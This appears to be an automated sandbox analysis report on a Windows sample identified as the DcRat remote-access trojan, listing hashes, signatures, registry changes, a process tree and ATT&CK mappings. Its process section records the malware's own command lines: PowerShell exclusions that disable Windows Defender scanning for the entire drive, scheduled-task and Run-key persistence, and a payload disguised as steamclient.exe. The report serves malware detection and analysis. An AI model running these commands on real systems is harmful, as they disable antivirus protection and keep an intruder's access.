Analysis

max time kernel: 121s
max time network: 123s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 30-11-2024 03:31

Static task: static1

Behavioral task: behavioral1
Sample: CE2EC4539435DFEAC7E246FE5565C521.exe
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: CE2EC4539435DFEAC7E246FE5565C521.exe
Resource: win10v2004-20241007-en
General

Target: CE2EC4539435DFEAC7E246FE5565C521.exe
Size: 2.9MB
MD5: ce2ec4539435dfeac7e246fe5565c521
SHA1: 59f3da006005a109914c31b5d5cd94dc4c93309c
SHA256: d5ee74f4f460c4f861c01ecc3e22b679075949108b6fee594193695d4175d562
SHA512: 408a1db2cd98702bca3811e124d78a56cbca79a1d200593759bde1947a4a599f8cd40cd8dbb2e7be7dec416e3f5de0c4466f98ddea1daf6d313671695f25a7ba
SSDEEP: 49152:6h/814lignPl1s5Cp5+tOCiqgc8I7uBiYUtGGirMn0JkH4SwiLwRktMtL+CsA7Z:6h/8Hgn9u4P+l8I7uB6db0JhAw6tMtLr
Malware Config

Signatures

DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019, capable of loading additional plugins.

Dcrat family
Modifies WinLogon for persistence (2 TTPs, 2 IoCs)

| description | ioc | Process |
|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Steam\\steamclient.exe\"" | CE2EC4539435DFEAC7E246FE5565C521.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Steam\\steamclient.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\CE2EC4539435DFEAC7E246FE5565C521.exe\"" | CE2EC4539435DFEAC7E246FE5565C521.exe |
Process spawned unexpected child process (6 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.

| description | pid | pid_target | Process | procid_target |
|---|---|---|---|---|
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 480 | 1940 | schtasks.exe | 28 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2796 | 1940 | schtasks.exe | 28 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2800 | 1940 | schtasks.exe | 28 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2096 | 1940 | schtasks.exe | 28 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2044 | 1940 | schtasks.exe | 28 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 328 | 1940 | schtasks.exe | 28 |
Command and Scripting Interpreter: PowerShell (1 TTPs, 14 IoCs)
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

| pid | Process |
|---|---|
| 2612 | powershell.exe |
| 2588 | powershell.exe |
| 2484 | powershell.exe |
| 2724 | powershell.exe |
| 1016 | powershell.exe |
| 2676 | powershell.exe |
| 800 | powershell.exe |
| 2700 | powershell.exe |
| 2984 | powershell.exe |
| 2012 | powershell.exe |
| 2092 | powershell.exe |
| 2480 | powershell.exe |
| 2548 | powershell.exe |
| 352 | powershell.exe |
Executes dropped EXE (1 IoCs)

| pid | Process |
|---|---|
| 2784 | steamclient.exe |
Adds Run key to start application (2 TTPs, 4 IoCs)

| description | ioc | Process |
|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\steamclient = "\"C:\\Program Files (x86)\\Steam\\steamclient.exe\"" | CE2EC4539435DFEAC7E246FE5565C521.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\steamclient = "\"C:\\Program Files (x86)\\Steam\\steamclient.exe\"" | CE2EC4539435DFEAC7E246FE5565C521.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\CE2EC4539435DFEAC7E246FE5565C521 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CE2EC4539435DFEAC7E246FE5565C521.exe\"" | CE2EC4539435DFEAC7E246FE5565C521.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CE2EC4539435DFEAC7E246FE5565C521 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CE2EC4539435DFEAC7E246FE5565C521.exe\"" | CE2EC4539435DFEAC7E246FE5565C521.exe |
Drops file in System32 directory (2 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | \??\c:\Windows\System32\CSCB32719BC980543A78AE64AA8AE9699C.TMP | csc.exe |
| File created | \??\c:\Windows\System32\byyuy-.exe | csc.exe |
Drops file in Program Files directory (3 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Program Files (x86)\Steam\steamclient.exe | CE2EC4539435DFEAC7E246FE5565C521.exe |
| File opened for modification | C:\Program Files (x86)\Steam\steamclient.exe | CE2EC4539435DFEAC7E246FE5565C521.exe |
| File created | C:\Program Files (x86)\Steam\fcafd258929766 | CE2EC4539435DFEAC7E246FE5565C521.exe |
Scheduled Task/Job: Scheduled Task (1 TTPs, 6 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

| pid | Process |
|---|---|
| 2096 | schtasks.exe |
| 2044 | schtasks.exe |
| 328 | schtasks.exe |
| 480 | schtasks.exe |
| 2796 | schtasks.exe |
| 2800 | schtasks.exe |
Suspicious behavior: EnumeratesProcesses (64 IoCs)

| pid | Process |
|---|---|
| 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe |
Suspicious use of AdjustPrivilegeToken (16 IoCs)

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe |
| Token: SeDebugPrivilege | 2676 | powershell.exe |
| Token: SeDebugPrivilege | 2612 | powershell.exe |
| Token: SeDebugPrivilege | 2724 | powershell.exe |
| Token: SeDebugPrivilege | 2480 | powershell.exe |
| Token: SeDebugPrivilege | 2984 | powershell.exe |
| Token: SeDebugPrivilege | 2588 | powershell.exe |
| Token: SeDebugPrivilege | 1016 | powershell.exe |
| Token: SeDebugPrivilege | 2012 | powershell.exe |
| Token: SeDebugPrivilege | 2092 | powershell.exe |
| Token: SeDebugPrivilege | 800 | powershell.exe |
| Token: SeDebugPrivilege | 2484 | powershell.exe |
| Token: SeDebugPrivilege | 2700 | powershell.exe |
| Token: SeDebugPrivilege | 2548 | powershell.exe |
| Token: SeDebugPrivilege | 352 | powershell.exe |
| Token: SeDebugPrivilege | 2784 | steamclient.exe |
Suspicious use of WriteProcessMemory (60 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 2432 wrote to memory of 3056 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 32 |
| PID 3056 wrote to memory of 604 | 3056 | csc.exe | 35 |
| PID 2432 wrote to memory of 2012 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 40 |
| PID 2432 wrote to memory of 2984 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 41 |
| PID 2432 wrote to memory of 352 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 42 |
| PID 2432 wrote to memory of 1016 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 44 |
| PID 2432 wrote to memory of 2724 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 45 |
| PID 2432 wrote to memory of 2548 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 46 |
| PID 2432 wrote to memory of 2484 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 48 |
| PID 2432 wrote to memory of 2480 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 49 |
| PID 2432 wrote to memory of 2700 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 50 |
| PID 2432 wrote to memory of 2092 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 52 |
| PID 2432 wrote to memory of 2588 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 53 |
| PID 2432 wrote to memory of 800 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 54 |
| PID 2432 wrote to memory of 2612 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 56 |
| PID 2432 wrote to memory of 2676 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 57 |
| PID 2432 wrote to memory of 1976 | 2432 | CE2EC4539435DFEAC7E246FE5565C521.exe | 68 |
| PID 1976 wrote to memory of 2452 | 1976 | cmd.exe | 70 |
| PID 1976 wrote to memory of 2636 | 1976 | cmd.exe | 71 |
| PID 1976 wrote to memory of 2784 | 1976 | cmd.exe | 72 |
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

- C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe"
  PID: 2432
  - Modifies WinLogon for persistence
  - Adds Run key to start application
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0mf1e0gc\0mf1e0gc.cmdline"
    PID: 3056
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF8F.tmp" "c:\Windows\System32\CSCB32719BC980543A78AE64AA8AE9699C.TMP"
      PID: 604
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
    PID: 2012
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
    PID: 2984
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
    PID: 352
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
    PID: 1016
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
    PID: 2724
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
    PID: 2548
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
    PID: 2484
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
    PID: 2480
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
    PID: 2700
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
    PID: 2092
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
    PID: 2588
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
    PID: 800
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'
    PID: 2612
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'
    PID: 2676
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pWdHaxy7nM.bat"
    PID: 1976
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\chcp.com
      Command line: chcp 65001
      PID: 2452
    - C:\Windows\system32\w32tm.exe
      Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      PID: 2636
    - C:\Program Files (x86)\Steam\steamclient.exe
      Command line: "C:\Program Files (x86)\Steam\steamclient.exe"
      PID: 2784
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "steamclients" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Steam\steamclient.exe'" /f
  PID: 480
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
- C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "steamclient" /sc ONLOGON /tr "'C:\Program Files (x86)\Steam\steamclient.exe'" /rl HIGHEST /f
  PID: 2800
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
- C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "steamclients" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Steam\steamclient.exe'" /rl HIGHEST /f
  PID: 2796
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
- C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "CE2EC4539435DFEAC7E246FE5565C521C" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'" /f
  PID: 2096
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
- C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "CE2EC4539435DFEAC7E246FE5565C521" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'" /rl HIGHEST /f
  PID: 2044
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
- C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "CE2EC4539435DFEAC7E246FE5565C521C" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'" /rl HIGHEST /f
  PID: 328
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
Network

MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Downloads